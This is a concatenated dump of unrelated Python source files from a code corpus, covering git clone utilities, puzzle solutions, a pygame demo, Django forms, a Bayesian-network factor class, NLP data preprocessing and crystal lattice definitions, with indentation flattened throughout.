### Andrzej Oleś <andrzej.oles@embl.de>
### Hervé Pagès <hpages@fredhutch.org>
###
### Last modification: May 08, 2018
###
### gitutils module
###
import sys
import os
import bbs.jobs
import bbs.fileutils
def _create_clone(clone_path, repo_url, branch=None, depth=None):
try:
git_cmd = os.environ['BBS_GIT_CMD']
except KeyError:
git_cmd = 'git'
cmd = '%s clone' % git_cmd
if branch != None:
cmd += ' --branch %s' % branch
if depth != None:
cmd += ' --depth %s' % depth
cmd = '%s %s %s' % (cmd, repo_url, clone_path)
print "bbs.gitutils._create_clone> %s" % cmd
bbs.jobs.doOrDie(cmd)
print ""
return
def _update_clone(clone_path, repo_url, branch=None, snapshot_date=None):
try:
git_cmd = os.environ['BBS_GIT_CMD']
except KeyError:
git_cmd = 'git'
old_cwd = os.getcwd()
print "bbs.gitutils._update_clone> cd %s" % clone_path
os.chdir(clone_path)
print ""
if branch != None:
## checkout branch
cmd = '%s checkout %s' % (git_cmd, branch)
print "bbs.gitutils._update_clone> %s" % cmd
retcode = bbs.jobs.call(cmd)
if retcode != 0:
print "bbs.gitutils._update_clone> cd %s" % old_cwd
os.chdir(old_cwd)
return retcode
print ""
if snapshot_date == None:
cmd = '%s pull' % git_cmd
else:
## we fetch instead of pull so we can then merge up to snapshot
## date (see below)
cmd = '%s fetch' % git_cmd
print "bbs.gitutils._update_clone> %s" % cmd
retcode = bbs.jobs.call(cmd)
if retcode != 0:
print "bbs.gitutils._update_clone> cd %s" % old_cwd
os.chdir(old_cwd)
return retcode
print ""
if snapshot_date != None:
## Andrzej: merge only up to snapshot date
## (see https://stackoverflow.com/a/8223166/2792099)
## Hervé: That doesn't seem to work reliably. Switching to a
## simple 'git merge' for now...
#cmd = '%s merge `%s rev-list -n 1 --before="%s" %s`' % (git_cmd, git_cmd, snapshot_date, branch)
cmd = '%s merge' % git_cmd
print "bbs.gitutils._update_clone> %s" % cmd
retcode = bbs.jobs.call(cmd)
if retcode != 0:
print "bbs.gitutils._update_clone> cd %s" % old_cwd
os.chdir(old_cwd)
return retcode
print ""
print "bbs.gitutils._update_clone> cd %s" % old_cwd
os.chdir(old_cwd)
return 0
def update_git_clone(clone_path, repo_url, branch=None, depth=None, snapshot_date=None, reclone_if_update_fails=False):
if os.path.exists(clone_path):
retcode = _update_clone(clone_path, repo_url, branch, snapshot_date)
if retcode == 0:
return
print ""
print "bbs.gitutils.update_git_clone> _update_clone() failed " + \
"with error code %d!" % retcode
if not reclone_if_update_fails:
sys.exit("bbs.gitutils.update_git_clone> EXIT")
print "bbs.gitutils.update_git_clone> ==> will try to re-create " + \
"git clone from scratch ..."
print "bbs.gitutils.update_git_clone> rm -r %s" % clone_path
bbs.fileutils.nuke_tree(clone_path)
print ""
_create_clone(clone_path, repo_url, branch, depth)
return
if __name__ == "__main__":
sys.exit("ERROR: this Python module can't be used as a standalone script yet")
|
994,263 | b5dd4e334e611267de1fa0eaa970be49ec7996d3 | from collections import deque
import sys
T = int(sys.stdin.readline())
for i in range(T):
N, M = map(int, sys.stdin.readline().split())
arr = list((map(int, input().split())))
queue = deque(enumerate(arr))
cnt = 0
flag = -1
answer = 0
while queue:
point = queue.popleft()
if point[1] == max(arr):
cnt +=1
arr.remove(point[1])
flag = point[0]
else:
queue.append(point)
if point[0] == M:
answer = cnt
print(answer)
|
994,264 | 059210140f9fb045f348e28842e54e154414a2ce | import pygame
import sys
WHITE=(255,255,255)
BLACK=(0,0,0)
def main():
pygame.init()
pygame.display.set_caption('My Game')
screen=pygame.display.set_mode((640,360))
clock=pygame.time.Clock()
img_bg=pygame.image.load('pg_bg.png')
img_chara=[
pygame.image.load('pg_chara0.png'),
pygame.image.load('pg_chara1.png'),
]
tmr=0
while True:
tmr=tmr+1
for event in pygame.event.get():
if event.type==pygame.QUIT:
pygame.quit()
sys.exit()
if event.type==pygame.KEYDOWN:
if event.key==pygame.K_F1:
screen=pygame.display.set_mode((640,360),pygame.FULLSCREEN)
if event.key==pygame.K_F2 or event.key==pygame.K_ESCAPE:
screen=pygame.display.set_mode((600,360))
x=tmr%160
for i in range(5):
screen.blit(img_bg,[i*160-x,0])
screen.blit(img_chara[tmr%2],[224,160])
pygame.display.update()
clock.tick(5)
if __name__=='__main__':
main()
|
994,265 | f23464ca93b05f68f51b85ef5a37ef504933c834 | f = open("input.txt")
inp = ''
out = ''
for line in f:
#print(line)
if line[-1] == '\n':
inp += line[:-1]
else:
inp += line
def calcSize( segment ):
count = 0
i = 0
#print(segment)
while i < len(segment):
if segment[i] == '(':
inst = ''
x = 1
while segment[i+x] != ')':
x += 1
inst = segment[i+1:i+x].split('x') # take the part inside () and split
inst = [int(x) for x in inst]
#print(segment[i+x+1:i+x+inst[0]+1])
size = calcSize(segment[i+x+1:i+x+inst[0]+1])
count += size*inst[1]
i = i+inst[0]+x
else:
count += 1
i += 1
return count
print(calcSize(inp))
|
994,266 | 170dca043ea496c95665e7734102bc7c462ca22c | # -*- coding:utf-8 -*-
'''
'''
from ass_module import AssModule
import ass_base
class AssBase(AssModule):
def __init__(self):
super(AssBase, self).__init__()
self.print_report = False
def run(self):
super(AssBase, self).run()
ass_base.write_file(self.apk_file+".xml", "applicationName = "+self.report.report.basic.appName+"\npackageName = "+self.report.report.basic.packageName+"\nversionName = "+self.report.report.basic.appVersion)
if __name__=="__main__":
AssBase().main()
|
994,267 | da4aa8f0eceb76e23579dd8c7698d9e12817ae47 | from cog.models import *
from django.forms import ModelForm, ModelMultipleChoiceField, NullBooleanSelect
from django.db import models
from django.contrib.admin.widgets import FilteredSelectMultiple
from django import forms
from django.forms import ModelForm, Textarea, TextInput, Select, SelectMultiple, FileInput, CheckboxSelectMultiple
from django.core.exceptions import ObjectDoesNotExist
from os.path import basename
import re
from cog.utils import *
from django.db.models import Q
from cog.forms.forms_image import ImageForm
from cog.utils import hasText
#note parent and peer formatting is in forms_other.py
class ProjectForm(ModelForm):
# define the widget for parent/peer selection so we can set the styling. The class is set to .selectfilter and its
# styles are controlled in cogstyle.css
parents = forms.ModelMultipleChoiceField("parents", required=False,
widget=forms.SelectMultiple(attrs={'size': '20',
'class': 'selectprojects'}))
peers = forms.ModelMultipleChoiceField("peers", required=False,
widget=forms.SelectMultiple(attrs={'size': '20',
'class': 'selectprojects'}))
# filtering of what is see in the form is done down below.
# ERROR: FilteredSelectMultiple does not exist in the module but choosing widget=SelectMultiple throws an error.
# FilteredSelectMultiple throws an error in IE.
# extra field not present in model, used for deletion of previously uploaded logo
delete_logo = forms.BooleanField(required=False)
# specify size of logo_url text field
logo_url = forms.CharField(required=False, widget=TextInput(attrs={'size': '80'}))
# extra fields to manage folder state
#folders = ModelMultipleChoiceField(queryset=Folder.objects.all(), required=False, widget=CheckboxSelectMultiple)
# override __init__ method to change the querysets for 'parent' and 'peers'
def __init__(self, *args, **kwargs):
super(ProjectForm, self).__init__(*args, **kwargs)
current_site = Site.objects.get_current()
queryset2 = Q(site__id=current_site.id) | Q(site__peersite__enabled=True)
if 'instance' in kwargs:
# peer and parent query-set options: exclude the project itself, projects from disabled peer nodes
instance = kwargs.get('instance')
queryset1 = ~Q(id=instance.id)
self.fields['parents'].queryset = \
Project.objects.filter(queryset1).filter(queryset2).distinct().\
extra(select={'snl': 'lower(short_name)'}, order_by=['snl'])
self.fields['peers'].queryset = \
Project.objects.filter(queryset1).filter(queryset2).distinct().\
extra(select={'snl': 'lower(short_name)'}, order_by=['snl'])
else:
# peer and parent query-set options: exclude projects from disabled peer nodes
self.fields['parents'].queryset = \
Project.objects.filter(queryset2).distinct().extra(select={'snl': 'lower(short_name)'},
order_by=['snl'])
self.fields['peers'].queryset = \
Project.objects.filter(queryset2).distinct().extra(select={'snl': 'lower(short_name)'},
order_by=['snl'])
# overridden validation method for project short name
def clean_short_name(self):
short_name = self.cleaned_data['short_name']
# must not start with any of the URL matching patterns
if short_name in ('admin', 'project', 'news', 'post', 'doc', 'signal'):
raise forms.ValidationError("Sorry, '%s' "
"is a reserved URL keyword - it cannot be used as project short name"
% short_name)
# only allows letters, numbers, '-' and '_'
if re.search("[^a-zA-Z0-9_\-]", short_name):
raise forms.ValidationError("Project short name contains invalid characters")
# do not allow new projects to have the same short name as existing ones, regardless to case
if self.instance.id is None: # new projects only
try:
p = Project.objects.get(short_name__iexact=short_name)
raise forms.ValidationError("The new project short name conflicts with an existing project: %s"
% p.short_name)
except Project.DoesNotExist:
pass
return short_name
def clean_long_name(self):
long_name = self.cleaned_data['long_name']
# do not allow quotation characters in long name (causes problems in browser widget)
if '\"' in long_name:
raise forms.ValidationError("Quotation characters are not allowed in project long name")
# check for non-ascii characters
try:
long_name.decode('ascii')
except (UnicodeDecodeError, UnicodeEncodeError):
raise forms.ValidationError("Project long name contains invalid non-ASCII characters")
return long_name
class Meta:
model = Project
fields = ('short_name', 'long_name', 'author', 'description',
'parents', 'peers', 'logo', 'logo_url', 'active', 'private', 'shared',
'dataSearchEnabled', 'nodesWidgetEnabled',
'site', 'maxUploadSize')
class ContactusForm(ModelForm):
# overridden validation method for project short name
def clean_projectContacts(self):
value = self.cleaned_data['projectContacts']
if not hasText(value):
raise forms.ValidationError("Project Contacts cannot be empty")
return value
class Meta:
model = Project
fields = ('projectContacts', 'technicalSupport', 'meetingSupport', 'getInvolved')
widgets = {'projectContacts': Textarea(attrs={'rows': 4}),
'technicalSupport': Textarea(attrs={'rows': 4}),
'meetingSupport': Textarea(attrs={'rows': 4}),
'getInvolved': Textarea(attrs={'rows': 4}), }
class DevelopmentOverviewForm(ModelForm):
class Meta:
model = Project
widgets = {'developmentOverview': Textarea(attrs={'rows': 8})}
fields = ('developmentOverview',)
class SoftwareForm(ModelForm):
class Meta:
model = Project
widgets = {'software_features': Textarea(attrs={'rows': 8}),
'system_requirements': Textarea(attrs={'rows': 8}),
'license': Textarea(attrs={'rows': 1}),
'implementationLanguage': Textarea(attrs={'rows': 1}),
'bindingLanguage': Textarea(attrs={'rows': 1}),
'supportedPlatforms': Textarea(attrs={'rows': 8}),
'externalDependencies': Textarea(attrs={'rows': 8}),
}
fields = ('software_features', 'system_requirements', 'license',
'implementationLanguage', 'bindingLanguage', 'supportedPlatforms', 'externalDependencies')
def clean(self):
features = self.cleaned_data.get('software_features')
if not hasText(features):
self._errors["software_features"] = self.error_class(["'SoftwareFeatures' must not be empty."])
print 'error'
return self.cleaned_data
class UsersForm(ModelForm):
class Meta:
model = Project
widgets = {'getting_started': Textarea(attrs={'rows': 12}), }
fields = ('getting_started', )
class ProjectTagForm(ModelForm):
# since this is the base form, we don't have access to the project's specific tags. The form is initialized in the
# form constructor in views_project.py
# field['tags'] is the list of preexisting tags
tags = forms.ModelMultipleChoiceField("tags", required=False,
widget=forms.SelectMultiple(attrs={'size': '7'}))
# override __init__ method to change the queryset for 'tags'
def __init__(self, *args, **kwargs):
super(ProjectTagForm, self).__init__(*args, **kwargs)
self.fields['tags'].queryset = ProjectTag.objects.all().order_by('name')
class Meta:
model = ProjectTag
fields = ('tags', 'name')
widgets = {'name': TextInput, }
#override clean function
def clean(self):
name = self.cleaned_data['name']
try:
tag = ProjectTag.objects.get(name__iexact=name)
# check tag with same name (independently of case) does not exist already
if tag is not None and tag.id != self.instance.id: # not this tag
self._errors["name"] = self.error_class(["Tag with this name already exist: %s" % tag.name])
except ObjectDoesNotExist:
# capitalize the tag name - NOT ANY MORE SINCE WE WANT TO CONSERVE CASE
#self.cleaned_data['name'] = self.cleaned_data['name'].capitalize()
# only allow letters, numbers, '-' and '_'
if re.search("[^a-zA-Z0-9_\-\s]", name):
self._errors["name"] = self.error_class(["Tag name contains invalid characters"])
# impose maximum length
if len(name) > MAX_PROJECT_TAG_LENGTH:
self._errors["name"] = self.error_class(["Tag name must contain at most %s characters"
% MAX_PROJECT_TAG_LENGTH])
return self.cleaned_data
|
994,268 | 6959e82dfb1e2a2b7eaf08e962f42ed370908bb4 | # Cracking the Coding Interview
# p 79 - converting between hex and binary
# 3/11/2016
# @totallygloria
def convert_10(num, base):
lookup = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
int_sum = 0
for i in range(len(num)): # counts bases from zero up, walks backward through string
int_sum += (base ** i) * lookup.index(num[-1 - i])
return int_sum
def compare_nums(num1, base1, num2, base2):
if (base1 < 2 or base1 > 35) or (base2 < 2 or base2 > 35):
return None
return (convert_10(num1, base1)) == (convert_10(num2, base2))
print compare_nums("110", 1, "0", 16)
print compare_nums("110", 2, "0", 59)
print compare_nums("0", 2, "0", 16)
print compare_nums("5", 10, "5", 10)
print compare_nums("111", 2, "7", 16)
print compare_nums("167", 10, "A7", 16)
print compare_nums("11100111", 2, "E7", 16)
print compare_nums("110111", 2, "B4", 16)
print compare_nums("1110011", 4, "E", 16)
print compare_nums("110111", 2, "E7", 12)
"""
Problems in the first run:
* Tried to do a dict-like look-up, instead of using .index
* Used a stack and then needed a second loop to unpack it
* forgot to convert the values with str()
* almost forgot to add the last value (the second add outside of the loop)
* had to solve the binary part by hand by counting it out to figure out order
* some basic syntax errors (all caught immediately, but need to be more careful)
* Doesn't work, you need to use a stack!
Problems with second try:
* didn't check if the base < 2 or greater than the lookup index
* tried to name the variable sum, which is a reserved word
* counted UP the digits, instead of down
* Added a return None inside the comparison funct to return None instead
of calling the convert function if the bases are out of range
"""
|
994,269 | f8d1e6567bbefc5bb0d1e348984bdb9c264d8ea5 | # -*- coding: utf-8 -*-
from flectra import http
# class YkpAbsen(http.Controller):
# @http.route('/ykp_absen/ykp_absen/', auth='public')
# def index(self, **kw):
# return "Hello, world"
# @http.route('/ykp_absen/ykp_absen/objects/', auth='public')
# def list(self, **kw):
# return http.request.render('ykp_absen.listing', {
# 'root': '/ykp_absen/ykp_absen',
# 'objects': http.request.env['ykp_absen.ykp_absen'].search([]),
# })
# @http.route('/ykp_absen/ykp_absen/objects/<model("ykp_absen.ykp_absen"):obj>/', auth='public')
# def object(self, obj, **kw):
# return http.request.render('ykp_absen.object', {
# 'object': obj
# }) |
994,270 | 8cbf306c26051ab2a49edc620aabe343760c6549 | # Copyright (c) 2012, CyberPoint International, LLC
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the CyberPoint International, LLC nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL CYBERPOINT INTERNATIONAL, LLC BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''This module provides tools for creating and using an individual
factorized representation of a node. See description of factorized
representations in :doc:`tablecpdfactorization`.
'''
def prod(l):
""" Calculate the product of the iterable l """
r = 1
for x in l:
r *= x
return r
class TableCPDFactor:
"""Factorized representation of a CPD table.
This class represents a factorized representation of a conditional
probability distribution table.
"""
def __init__(self, vertex, bn):
'''Construct a factorized CPD table from a vertex in a discrete
Bayesian network.
This class is constructed with a
:doc:`DiscreteBayesianNetwork <discretebayesiannetwork>`
instance and a *vertex* name as arguments. First it stores
these inputs in *inputvertex* and *inputbn*. Then, it creates
a factorized representation of *vertex*, storing the values in
*vals*, the names of the variables involved in *scope* the
cardinality of each of these variables in *card* and the
stride of each of these variables in *stride*.
'''
self.inputvertex = vertex
'''The name of the vertex.'''
self.inputbn = bn
'''The :doc:`DiscreteBayesianNetwork <discretebayesiannetwork>` instance that the vertex lives in.'''
self.vals = []
'''A flat array of all the values from the CPD.'''
self.stride = {}
'''A dict of {vertex: value} pairs for each vertex in *self.scope*, where vertex is the name of the vertex and value is the self.stride of that vertex in the *self.vals* array.'''
self.card = []
'''A list of the self.cardinalities of each vertex in self.scope, where cardinality is the number of values that the vertex may take. The cardinalities are indexed according to the vertex's index in *scope*.'''
self.scope = []
'''An array of vertices that affect the self.vals found in *vals*. Normally, this is the node itself and its parents.'''
root = bn.Vdata[vertex]["cprob"]
parents = bn.Vdata[vertex]["parents"]
# add values
def explore(_dict, key, depth, totaldepth):
if depth == totaldepth:
for x in _dict[key]:
self.vals.append(x)
return
else:
for val in bn.Vdata[parents[depth]]["vals"]:
ckey = key + (val,)
explore(_dict, ckey, depth+1, totaldepth)
if not parents:
self.vals = bn.Vdata[vertex]["cprob"]
assert len(self.vals) == len(bn.Vdata[vertex]["vals"])
assert abs(sum(self.vals) - 1) < 1e-8
else:
td = len(parents)
explore(root, (), 0, td)
# add self.cardinalities
self.card.append(len(bn.Vdata[vertex]["vals"]))
if (bn.Vdata[vertex]["parents"] != None):
for parent in reversed(bn.Vdata[vertex]["parents"]):
self.card.append(len(bn.Vdata[parent]["vals"]))
# add self.scope
self.scope.append(vertex)
if (bn.Vdata[vertex]["parents"] != None):
for parent in reversed(bn.Vdata[vertex]["parents"]):
self.scope.append(parent)
# add self.self.stride
t_stride = 1
self.stride = dict()
for x in range(len(self.scope)):
self.stride[self.scope[x]] = (t_stride)
t_stride *= len(bn.Vdata[self.scope[x]]["vals"])
def multiplyfactor(self, other): # cf. PGM 359
'''Multiply this factor by another Factor
Multiplying factors means taking the union of the scopes, and
for each combination of variables in the scope, multiplying
together the probabilities from each factor that that
combination will be found.
Arguments:
1. *other* -- An instance of :doc:`TableCPDFactor <tablecpdfactor>` class representing the factor to multiply by.
Attributes modified:
*vals*, *scope*, *stride*, *t_card* -- Modified to reflect the data of the new product factor.
For more information cf. Koller et al. 359.
'''
# merge t_scopes
scope = self.scope
card = self.card
for t_scope, t_card in zip(other.scope, other.card):
try:
scope.index(t_scope)
except:
scope.append(t_scope)
card.append(t_card)
# algorithm (see book)
assignment = {}
vals = []
j = 0
k = 0
for _ in range(prod(card)):
vals.append(
self.vals[j] * other.vals[k])
for t_card, t_scope in zip(card, scope):
assignment[t_scope] = assignment.get(t_scope, 0) + 1
if (assignment[t_scope] == t_card):
assignment[t_scope] = 0
if t_scope in self.stride:
j = j - (t_card - 1) * self.stride[t_scope]
if t_scope in other.stride:
k = k - (t_card - 1) * other.stride[t_scope]
else:
if t_scope in self.stride:
j = j + self.stride[t_scope]
if t_scope in other.stride:
k = k + other.stride[t_scope]
break
# add strides
t_stride = 1
stride = {}
for t_card, t_scope in zip(card, scope):
stride[t_scope] = (t_stride)
t_stride *= t_card
self.vals = vals
self.scope = scope
self.card = card
self.stride = stride
def reducefactor(self, vertex, value=None):
'''Sum out the variable specified by *vertex* from the factor.
Summing out means summing all sets of entries together where
*vertex* is the only variable changing in the set. Then
*vertex* is removed from the scope of the factor.
Arguments:
1. *vertex* -- The name of the variable to be summed out.
Attributes modified:
*vals*, *scope*, *stride*, *card* -- Modified to reflect the data of the summed-out product factor.
For more information see Koller et al. 297.
'''
vscope = self.scope.index(vertex)
vstride = self.stride[vertex]
vcard = self.card[vscope]
result = [0 for i in range(len(self.vals)//self.card[vscope])]
# machinery that calculates values in summed out factor
k = 0
lcardproduct = prod(self.card[:vscope])
for i, entry in enumerate(result):
if value is None:
for h in range(vcard):
result[i] += self.vals[k + vstride * h]
else:
index = self.inputbn.Vdata[vertex]['vals'].index(value)
result[i] += self.vals[k + vstride * index]
k += 1
if (k % lcardproduct == 0):
k += (lcardproduct * (vcard - 1))
self.vals = result
# modify scope, card, and stride in new factor
self.scope.remove(vertex)
del(self.card[vscope])
for i in range(vscope, len(self.stride)-1):
self.stride[self.scope[i]] //= vcard
del(self.stride[vertex])
return self
sumout = reducefactor
def copy(self):
'''Return a copy of the factor.'''
copy = type(self)(self.inputvertex, self.inputbn)
copy.vals = self.vals[:]
copy.stride = self.stride.copy()
copy.scope = self.scope[:]
copy.card = self.card[:]
return copy
|
994,271 | bfb4a4cca5702191b61245dc837e494cbcd3e939 | ## Vacuum control program
## Built for VASP 4.6 or above format
## Built as a preliminary work as a part of MTG Materials Tool Kit.
## By Johnny Chang-Eun Kim, April. 2013
from vacuum_agent import *
from sys import argv
##where='0.5'
##howmuch='-10.0'
target=load('POSCAR', 'vacuum_edit')
where=argv[1]
howmuch=argv[2]
target.add_vacuum(float(where), float(howmuch))
File=open('POSCAR_vac_edited', 'w'); File.write(target.buildPOSCAR()); File.close()
|
994,272 | f14682ec87a7a211ce397fcafc9206b81ba332d5 | from itertools import permutations
n = int(input())
inning = [list(map(int, input().split())) for _ in range(n)]
answer = 0
for order in list(map(list, permutations(range(1, 9), 8))):
order = order[:3] + [0] + order[3:]
score = 0
i = 0
for k in range(n):
out = 0
base1, base2, base3 = 0, 0, 0
while out < 3:
res = inning[k][order[i]]
if res == 0:
out += 1
elif res == 1:
score += base3
base1, base2, base3 = 1, base1, base2
elif res == 2:
score += base2 + base3
base1, base2, base3 = 0, 1, base1
elif res == 3:
score += base1 + base2 + base3
base1, base2, base3 = 0, 0, 1
else:
score += base1 + base2 + base3 + 1
base1, base2, base3 = 0, 0, 0
i += 1
if i == 9:
i = 0
answer = max(answer, score)
print(answer)
|
994,273 | a99bbf44434be264b4d823d25392538964245ca7 | # -*- coding: UTF-8 -*-
from pysenal.io import *
from datagrand_ie_2019.utils.constant import *
from datagrand_ie_2019.data_process.entity2label import Entity2Label
def process_training_data(src_filename, dest_filename):
e2l = Entity2Label(resolve_conflict=False)
data = []
for idx, line in enumerate(read_lines_lazy(src_filename)):
tokens = []
entities = []
labels = []
index = 0
for segment in line.split(' '):
token_seq_str, tag = segment.rsplit('/', 1)
token_seq = token_seq_str.split('_')
seg_token_len = len(token_seq)
seg_tokens = []
for t_idx, token_str in enumerate(token_seq):
start = index + t_idx
token = {'text': token_str, 'start': start, 'end': start + 1}
seg_tokens.append(token)
if tag != 'o':
entity = {'start': index, 'end': index + len(token_seq), 'type': tag}
entities.append(entity)
seg_labels = e2l.single({'type': tag}, index, index + len(token_seq))
else:
seg_labels = ['O'] * seg_token_len
tokens.extend(seg_tokens)
labels.extend(seg_labels)
index += len(token_seq)
item = {'tokens': tokens, 'entities': entities, 'labels': labels, 'index': idx}
data.append(item)
write_json(dest_filename, data)
def process_test_data():
data = []
for idx, line in enumerate(read_lines_lazy(RAW_DATA_DIR + 'test.txt')):
token_texts = line.split('_')
tokens = []
for t_idx, token in enumerate(token_texts):
tokens.append({'text': token, 'start': t_idx, 'end': t_idx + 1})
data.append({'tokens': tokens})
write_json(TEST_FILE, data)
def split_data():
data = read_json(TRAINING_FILE)
count = len(data)
training_count = int(count * 0.9)
write_json(DATA_DIR + 'pre_data/training.json', data[:training_count])
write_json(DATA_DIR + 'pre_data/test.json', data[training_count:])
def generate_nn_seq_vocab():
words = [BATCH_PAD, BOS, EOS, UNK]
for sent in read_json(TRAINING_FILE):
for token in sent['tokens']:
if token['text'] not in words:
words.append(token['text'])
write_lines(DATA_DIR + 'neural_vocab.txt', words)
if __name__ == '__main__':
# process_training_data(RAW_DATA_DIR + 'train.txt', DATA_DIR + 'training.json')
# split_data()
# process_test_data()
generate_nn_seq_vocab()
|
994,274 | a58bca03675a31f7ddb1852a1a2bc132c6a5a06d | #!/usr/bin/env python3
# Copyright (c) 2015, Bartlomiej Puget <larhard@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the Bartlomiej Puget nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL BARTLOMIEJ PUGET BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import importlib
import logging
import sys
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--no-gui', '-n', action='store_true')
parser.add_argument('--verbose', '-v', action='store_true')
parser.add_argument('--white', '-w')
parser.add_argument('--black', '-b')
args = parser.parse_args()
if args.no_gui:
from backgammon.judge.main import main
else:
from backgammon.gui.main import main
if args.white:
args.white = importlib.import_module(args.white).Bot
if args.black:
args.black = importlib.import_module(args.black).Bot
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
main(**vars(args))
|
994,275 | 2ad360f9d18daf4288558fa33d1108b59e41c5e2 | import turtle
from random import randint
#region dessiner l'echiquier
Circuit = turtle.Turtle()
turtle.Screen().setworldcoordinates(-20, turtle.Screen().window_height()/(-2),500,20)
Circuit.hideturtle()
Circuit.speed(100)
for i in range(4):
Circuit.forward(400)
Circuit.right(90)
a = 0
b = 0
for i in range(8):
if(b == 0):
a=1
else:
a = 0
for j in range(8):
Circuit.penup()
Circuit.goto(j * 50, i * 50 * (-1))
Circuit.pendown()
if(a == 0):
Circuit.fillcolor('#33ff88')
a=1
else:
Circuit.fillcolor('white')
a=0
Circuit.begin_fill()
for k in range(4):
Circuit.forward(50)
Circuit.right(90)
Circuit.end_fill()
if(b==0):
b=1
else:
b=0
#endregion
#region Mettre en place les déchets à ramasser d'une façon aléatoire
ListeDechets = []
compteurdechets = 0
while compteurdechets < 15:
alea = (randint(0, 7), randint(0, 7))
if alea not in ListeDechets:
ListeDechets.append(alea)
compteurdechets = compteurdechets + 1
for dechet in ListeDechets:
Circuit.penup()
Circuit.goto((20 + (50 * dechet[0])), (-25 - (50 * dechet[1])))
Circuit.pendown()
Circuit.fillcolor('red')
Circuit.begin_fill()
for i in range(3):
Circuit.forward(10)
Circuit.left(120)
Circuit.end_fill()
#endregion
turtle.exitonclick()
|
994,276 | 8b0bf16e775610481c0ad807be30cd8bd1be10c3 | '''input file'''
import math
bcc_screw = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : math.sqrt(2), #[-1,1,0]
"cell_y" : math.sqrt(6)/3, #[1,1,2]
"cell_z" : math.sqrt(3)/2,#[1,1,1]
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[0.5, 0.5, 1./3 ]],
# type of each atom
"type_basis_atoms" : [1, 1],
# Burgers vector (scaled by lattice constant)
"burgers" : [0.5, 0.5, 0.5],
# dislocation line direction (unit vector)
"disl_line_direction" : [1./math.sqrt(3.), 1./math.sqrt(3.), 1./math.sqrt(3.)],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
# new frame: [e1', e2', e3'], ei' are column vectors
"frame_new" : [[ -1.0, -0.5, 1.0],
[ 1.0, -0.5, 1.0],
[ 0, 1.0, 1.0]],
}
bcc_normal = {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 1, #[1,0,0]
"cell_y" : 1, #[0,1,0]
"cell_z" : 1, #[0,0,1]
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[0.5, 0.5, 0.5]],
# type of each atom
"type_basis_atoms" : [1, 1],
# Burgers vector (scaled by lattice constant)
"burgers" : [0.5, 0.5, 0.5],
# dislocation line direction (unit vector)
"disl_line_direction" : [1./math.sqrt(3.), 1./math.sqrt(3.), 1./math.sqrt(3.)],
# initial frame: [e1, e2, e3], ei are column vectors
"frame_initial" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
# new frame: [e1', e2', e3'], ei' are column vectors
"frame_new" : [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
}
fcc_edge= {
# edge length of a unit cell (scaled by lattice constant)
"cell_x" : 0.5 * math.sqrt(2),
"cell_y" : math.sqrt(3),
"cell_z" : 0.5 * math.sqrt(6),
# basis atoms (relative coordinates)
"basis_atoms" : [[0, 0, 0 ],
[1./2., 0, 1./2. ],
[0, 2./3., 1./3. ],
[1./2., 2./3., 5./6. ],
[0, 1./3., 2./3. ],
[1./2., 1./3., 1./6. ]],
# type of each atom
"type_basis_atoms" : [1, 1, 1, 1, 1, 1],
# Burgers vector (scaled by lattice constant)
"burgers" : [-0.5, 0.5, 0.0],
# dislocation line direction (unit vector)
